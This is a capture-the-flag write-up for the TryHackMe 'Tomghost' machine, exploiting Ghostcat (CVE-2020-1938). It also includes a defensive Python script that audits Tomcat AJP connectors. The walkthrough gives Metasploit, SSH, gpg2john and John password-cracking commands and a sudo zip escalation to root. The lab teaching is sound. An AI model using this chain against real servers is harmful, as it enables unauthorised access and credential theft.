TomGhost CTF

JAY BHATT
Published in System Weakness
4 min read · Mar 14, 2022


Hello Everyone,

The Tomghost machine hosted on @tryhackme focuses on CVE-2020-1938 (CVSS score 7.5), the Ghost Cat vulnerability.

It applies when the server exposes its AJP connector and unauthorized users can reach that service, which could lead to remote code execution on the server.
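As an added example (not part of the original write-up or of Tomcat itself), the script below audits a Tomcat server.xml for the AJP exposure Ghost Cat relies on. The XML fragments are constructed, and the defaults assumed for missing attributes are those of Tomcat 9.0.30, the version on this box: the AJP connector listens on all interfaces and requires no shared secret.

```python
"""Flag Tomcat AJP connectors exposed the way CVE-2020-1938 (Ghostcat) requires.

Added example for this write-up, not code from the TryHackMe room or Tomcat.
Defaults assumed for missing attributes are those of Tomcat 9.0.30: the AJP
connector listens on all interfaces and requires no shared secret.
"""
import xml.etree.ElementTree as ET

# Constructed fragment: an AJP connector with the 9.0.30 defaults (exposed).
WEAK_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

# Constructed fragment: loopback-only and protected by a shared secret.
HARDENED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>
</Service></Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector reachable from other hosts without a secret."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").startswith("AJP/"):
            continue  # HTTP connectors are not affected by Ghostcat
        port = conn.get("port", "?")
        address = conn.get("address", "0.0.0.0")  # 9.0.30 default: all interfaces
        has_secret = (conn.get("secretRequired", "false").lower() == "true"
                      and bool(conn.get("secret")))
        if address not in LOOPBACK and not has_secret:
            findings.append(f"AJP connector on {address}:{port} is reachable "
                            "from other hosts and has no shared secret")
    return findings


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or "no findings")
```

Point it at a real server.xml by reading the file into `audit_ajp_connectors`; an empty result means every AJP connector is either loopback-bound or secret-protected.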

Let's boot up the machine and start with a simple Nmap scan.

# Nmap 7.80 scan initiated Sun Mar 13 15:15:29 2022 as: nmap -Pn -A -vvv -sV -sC -oA normal 10.10.16.253
Nmap scan report for 10.10.16.253
Host is up, received user-set (0.15s latency).
Scanned at 2022-03-13 15:15:29 IST for 32s
Not shown: 996 closed ports
Reason: 996 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ=
| 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw
53/tcp open tcpwrapped syn-ack
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 15:16:01 2022 -- 1 IP address (1 host up) scanned in 32.87 seconds

Ports 22, 53, 8009 and 8080 are open on the server, and the HTTP service identifies itself as Tomcat 9.0.30. Googling that version leads to a Metasploit module for the vulnerability:

msf > search tomcat 9.0
msf > use 0
msf > show options
msf > set rhost <IP>
msf > run

With that, we got our credentials. Let's connect over SSH:

ssh skyfuck@<IP>

and we are on the server.

Running ls shows two interesting files, tryhackme.asc and credential.pgp:

ls -la

Copy both files to the local machine with scp.

Now we need to crack the passphrase of the PGP key with John. First convert the key into a John-compatible hash:

gpg2john tryhackme.asc > hash

Then run:

john --wordlist=rockyou.txt hash

With that, we have the passphrase of the tryhackme key. Let's decrypt credential.pgp and enter the passphrase when prompted:

gpg --decrypt credential.pgp

Decrypting credential.pgp gives us the password for the user merlin.

SSH in as merlin and cat user.txt to get the first flag.

For privilege escalation, run

sudo -l

We can run zip as root without a password. Let's look up zip on GTFOBins; running the command listed there successfully escalated our privileges.

Root flag:

# cat ~/root.txt

The main objective of this machine was the Ghost Cat exploit, followed by escalating privileges through the zip binary.

Hope you liked this blog, and thanks for reading it.
Happy hacking!
